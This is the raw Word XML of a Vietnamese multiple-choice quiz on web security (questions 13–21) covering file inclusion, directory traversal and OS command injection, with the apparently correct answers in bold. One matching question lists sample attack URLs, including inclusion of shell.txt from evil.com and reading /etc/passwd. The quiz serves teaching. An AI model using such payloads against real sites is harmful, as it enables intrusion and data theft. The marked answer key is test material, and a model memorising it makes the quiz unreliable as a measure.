      <w:r w:rsidRPr="00DA21E1">
        <w:t>Khóa toàn bộ quyền truy cập của người dùng hợp lệ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E7F09F" w14:textId="60065811" w:rsidR="00DA21E1" w:rsidRPr="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA21E1">
        <w:t>d.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:t>Mã hóa toàn bộ hệ thống file của hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B196BE" w14:textId="2206AFF9" w:rsidR="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="753B0B6F" w14:textId="77777777" w:rsidR="00DA21E1" w:rsidRPr="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12157DC9" w14:textId="769C059E" w:rsidR="00DA21E1" w:rsidRPr="006F6CC2" w:rsidRDefault="00DA21E1" w:rsidP="006F6CC2"/>
    <w:p w14:paraId="58DCD76B" w14:textId="77777777" w:rsidR="00DA21E1" w:rsidRPr="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Câu 13: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Điều gì xảy ra nếu một lỗ hổng LFI không được khắc phục?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08568323" w14:textId="68EF4715" w:rsidR="00DA21E1" w:rsidRPr="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kẻ tấn công có thể truy cập vào các file nhạy cảm và thực thi mã từ xa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7251FD1F" w14:textId="5795E6C9" w:rsidR="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:r>
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Server sẽ tự động mã hóa tất cả các file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B62C6BA" w14:textId="4D7D3529" w:rsidR="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:r>
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Kẻ tấn công chỉ có thể thay đổi cấu hình server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AA4C4B" w14:textId="18353E50" w:rsidR="006F6CC2" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:r>
        <w:t>d.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Không có nguy cơ bảo mật nào nếu lỗ hổng không được khắc phục</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F2509D" w14:textId="77777777" w:rsidR="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1"/>
    <w:p w14:paraId="0097DB66" w14:textId="77777777" w:rsidR="00DA21E1" w:rsidRPr="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Câu 14: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LFI thường được khai thác để thực hiện điều gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FA8020" w14:textId="2E95945A" w:rsidR="00DA21E1" w:rsidRPr="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Để xem nội dung của các file hệ thống hoặc thực thi mã từ xa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB2E93C" w14:textId="4A990687" w:rsidR="00DA21E1" w:rsidRPr="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:r w:rsidRPr="00DA21E1">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:t>Để tải file lên hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEFF3C2" w14:textId="6434AFFB" w:rsidR="00DA21E1" w:rsidRPr="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:r w:rsidRPr="00DA21E1">
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:t>Để xóa file khỏi hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360702B6" w14:textId="1E77D006" w:rsidR="00DA21E1" w:rsidRPr="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:r w:rsidRPr="00DA21E1">
        <w:t>d.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:t>Để mã hóa các file hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612410FA" w14:textId="45FFCC2B" w:rsidR="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1"/>
    <w:p w14:paraId="344ACB92" w14:textId="77777777" w:rsidR="00DA21E1" w:rsidRPr="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Câu 15: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OS Command Injection xảy ra khi nào?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DABEF4D" w14:textId="1E912679" w:rsidR="00DA21E1" w:rsidRPr="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khi ứng dụng web không kiểm soát đầu vào và thực thi các lệnh hệ thống từ dữ liệu của người dùng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA14A7F" w14:textId="0C020A5A" w:rsidR="00DA21E1" w:rsidRPr="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:r w:rsidRPr="00DA21E1">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:t>Khi ứng dụng web mã hóa toàn bộ các file được tải lên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A2D1DC" w14:textId="3E4AB5C8" w:rsidR="00DA21E1" w:rsidRPr="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:r w:rsidRPr="00DA21E1">
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:t>Khi ứng dụng web chặn tất cả các kết nối HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B8FEDE" w14:textId="7123154C" w:rsidR="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:r w:rsidRPr="00DA21E1">
        <w:t>d.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:t>Khi ứng dụng web chỉ cho phép các file được tải lên từ nguồn tin cậy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115EB986" w14:textId="77777777" w:rsidR="005D28D4" w:rsidRDefault="005D28D4" w:rsidP="00DA21E1"/>
    <w:p w14:paraId="1D9453FB" w14:textId="77777777" w:rsidR="005D28D4" w:rsidRPr="005D28D4" w:rsidRDefault="005D28D4" w:rsidP="005D28D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D28D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Câu 16: </w:t>
      </w:r>
      <w:r w:rsidRPr="005D28D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RFI cần điều kiện gì trên server để có thể khai thác thành công?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B44195A" w14:textId="5A662B08" w:rsidR="005D28D4" w:rsidRPr="005D28D4" w:rsidRDefault="005D28D4" w:rsidP="005D28D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D28D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="005D28D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D28D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server phải cấu hình allow_url_fopen và allow_url_include</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B02AD69" w14:textId="06B70557" w:rsidR="005D28D4" w:rsidRPr="005D28D4" w:rsidRDefault="005D28D4" w:rsidP="005D28D4">
      <w:r w:rsidRPr="005D28D4">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D28D4">
        <w:t>Server phải chạy trên nền tảng Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7204880E" w14:textId="63885C8F" w:rsidR="005D28D4" w:rsidRPr="005D28D4" w:rsidRDefault="005D28D4" w:rsidP="005D28D4">
      <w:r w:rsidRPr="005D28D4">
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D28D4">
        <w:t>Server phải có chứng chỉ SSL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ED6976" w14:textId="06F67216" w:rsidR="005D28D4" w:rsidRDefault="005D28D4" w:rsidP="005D28D4">
      <w:r w:rsidRPr="005D28D4">
        <w:t>d.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D28D4">
        <w:t>Server phải bật firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB4F865" w14:textId="77777777" w:rsidR="003529B3" w:rsidRDefault="003529B3" w:rsidP="005D28D4"/>
    <w:p w14:paraId="4DB933F9" w14:textId="77777777" w:rsidR="003529B3" w:rsidRDefault="003529B3">
      <w:pPr>
        <w:spacing w:line="278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2A7287A" w14:textId="06463057" w:rsidR="003529B3" w:rsidRPr="003529B3" w:rsidRDefault="003529B3" w:rsidP="003529B3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Câu 17: </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File inclusion có thể xuất hiện khi nào?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263AFEC6" w14:textId="41A8B6C8" w:rsidR="003529B3" w:rsidRPr="003529B3" w:rsidRDefault="003529B3" w:rsidP="003529B3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khi tham số từ request của người dùng được sử dụng để chọn file hoặc trang load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4604DE" w14:textId="3B9ABF34" w:rsidR="003529B3" w:rsidRPr="003529B3" w:rsidRDefault="003529B3" w:rsidP="003529B3">
      <w:r w:rsidRPr="003529B3">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:t>Khi file cấu hình của hệ thống bị lỗi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752D20F7" w14:textId="0F8BE22D" w:rsidR="003529B3" w:rsidRPr="003529B3" w:rsidRDefault="003529B3" w:rsidP="003529B3">
      <w:r w:rsidRPr="003529B3">
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:t>Khi server bị tấn công trực tiếp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AB52B8" w14:textId="6C18962D" w:rsidR="003529B3" w:rsidRPr="003529B3" w:rsidRDefault="003529B3" w:rsidP="003529B3">
      <w:r w:rsidRPr="003529B3">
        <w:t>d.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:t>Khi cơ chế mã hóa file không hoạt động</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBD9B4B" w14:textId="22910DD9" w:rsidR="003529B3" w:rsidRDefault="003529B3" w:rsidP="005D28D4"/>
    <w:p w14:paraId="6DDCB04F" w14:textId="77777777" w:rsidR="003529B3" w:rsidRPr="003529B3" w:rsidRDefault="003529B3" w:rsidP="003529B3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Câu 18: </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lệnh nào dưới đây trong PHP có thể bị khai thác để thực hiện OS Command</w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Injection?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F819084" w14:textId="5C40DC2A" w:rsidR="003529B3" w:rsidRPr="003529B3" w:rsidRDefault="003529B3" w:rsidP="003529B3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>system()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664598C1" w14:textId="3E519874" w:rsidR="003529B3" w:rsidRPr="003529B3" w:rsidRDefault="003529B3" w:rsidP="003529B3">
      <w:r w:rsidRPr="003529B3">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:t>echo()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B6DA6D" w14:textId="26C7DC51" w:rsidR="003529B3" w:rsidRPr="003529B3" w:rsidRDefault="003529B3" w:rsidP="003529B3">
      <w:r w:rsidRPr="003529B3">
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:t>print()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76683E02" w14:textId="17E0D13D" w:rsidR="003529B3" w:rsidRDefault="003529B3" w:rsidP="003529B3">
      <w:r w:rsidRPr="003529B3">
        <w:t>d.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:t>file_get_contents()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD4759A" w14:textId="77777777" w:rsidR="003529B3" w:rsidRDefault="003529B3" w:rsidP="003529B3"/>
    <w:p w14:paraId="7A77739F" w14:textId="3301EAE3" w:rsidR="003529B3" w:rsidRPr="003529B3" w:rsidRDefault="003529B3" w:rsidP="003529B3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Câu 19: </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lỗ hổng Local File Inclusion (LFI) xảy ra khi?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F94AADC" w14:textId="3E1BCD9F" w:rsidR="003529B3" w:rsidRPr="003529B3" w:rsidRDefault="003529B3" w:rsidP="003529B3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Không có xác thực người dùng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EE1E93" w14:textId="260CB6B9" w:rsidR="003529B3" w:rsidRPr="003529B3" w:rsidRDefault="003529B3" w:rsidP="003529B3">
      <w:r w:rsidRPr="003529B3">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:t>Người dùng gửi một URL không hợp lệ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D54D1EE" w14:textId="0878C7BF" w:rsidR="003529B3" w:rsidRPr="003529B3" w:rsidRDefault="003529B3" w:rsidP="003529B3">
      <w:r w:rsidRPr="003529B3">
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:t>Đường dẫn tệp do người dùng nhập không được kiểm tra và hợp lệ hóa đúng cách</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A88EFC" w14:textId="652A83D2" w:rsidR="003529B3" w:rsidRDefault="003529B3" w:rsidP="003529B3">
      <w:r w:rsidRPr="003529B3">
        <w:t>d.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:t>Ứng dụng sử dụng ngôn ngữ lập trình PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C80A7E3" w14:textId="77777777" w:rsidR="003529B3" w:rsidRDefault="003529B3" w:rsidP="003529B3"/>
    <w:p w14:paraId="1B6F4EC2" w14:textId="77777777" w:rsidR="003529B3" w:rsidRPr="003529B3" w:rsidRDefault="003529B3" w:rsidP="003529B3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Câu 20: </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ghép các khái niệm về LFI và RFI với ví dụ tương ứng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB3674B" w14:textId="21E751AE" w:rsidR="003529B3" w:rsidRPr="003529B3" w:rsidRDefault="003529B3" w:rsidP="003529B3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">a. </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Directory Traversal → /vulnerable.php?file=../../../../index.html, Remote File Inclusion → /vulnerable.php?file=http://evil.com/shell.txt, Local File Inclusion → /vulnerable.php?file=/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A31FCF9" w14:textId="05F94108" w:rsidR="003529B3" w:rsidRDefault="003529B3" w:rsidP="003529B3">
      <w:r>
        <w:t xml:space="preserve">b. </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local File Inclusion</w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:t xml:space="preserve"> → /vulnerable.php?file=../../../../index.html, </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remote File Inclusion </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:t xml:space="preserve">→ /vulnerable.php?file=http://evil.com/shell.txt, </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Directory Traversal</w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:t xml:space="preserve"> → /vulnerable.php?file=/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C90395" w14:textId="79C621C2" w:rsidR="003529B3" w:rsidRPr="003529B3" w:rsidRDefault="003529B3" w:rsidP="003529B3">
      <w:r>
        <w:t xml:space="preserve">c. </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local File Inclusion</w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:t xml:space="preserve"> → /vulnerable.php?file=../../../../index.html, </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Directory Traversal</w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:t xml:space="preserve"> → /vulnerable.php?file=http://evil.com/shell.txt, </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remote File Inclusion </w:t>
      </w:r>
      <w:r w:rsidRPr="003529B3">
        <w:t>→ /vulnerable.php?file=/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4B6ED4" w14:textId="77777777" w:rsidR="003529B3" w:rsidRDefault="003529B3" w:rsidP="003529B3"/>
    <w:p w14:paraId="74689C90" w14:textId="77777777" w:rsidR="00786029" w:rsidRPr="00786029" w:rsidRDefault="00786029" w:rsidP="00786029">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00786029">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Câu 21: </w:t>
      </w:r>
      <w:r w:rsidRPr="00786029">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LFI có thể dẫn đến điều gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C6D9FB" w14:textId="02884921" w:rsidR="00786029" w:rsidRPr="00786029" w:rsidRDefault="00786029" w:rsidP="00786029">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00786029">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="00786029">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00786029">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tất cả các đáp án trên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7728AAED" w14:textId="22BD93F5" w:rsidR="00786029" w:rsidRPr="00786029" w:rsidRDefault="00786029" w:rsidP="00786029">
      <w:r w:rsidRPr="00786029">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00786029">
        <w:t>Từ chối dịch vụ (DoS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175005DC" w14:textId="3C3F4112" w:rsidR="00786029" w:rsidRPr="00786029" w:rsidRDefault="00786029" w:rsidP="00786029">
      <w:r w:rsidRPr="00786029">
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00786029">
        <w:t>Rò rỉ thông tin nhạy cảm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626B7AC1" w14:textId="3CF12E44" w:rsidR="00786029" w:rsidRDefault="00786029" w:rsidP="00786029">
      <w:r w:rsidRPr="00786029">
        <w:t>d.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00786029">
        <w:t>Chạy mã trên phía máy khách</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122FFEDF" w14:textId="56517844" w:rsidR="006C450B" w:rsidRDefault="006C450B">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
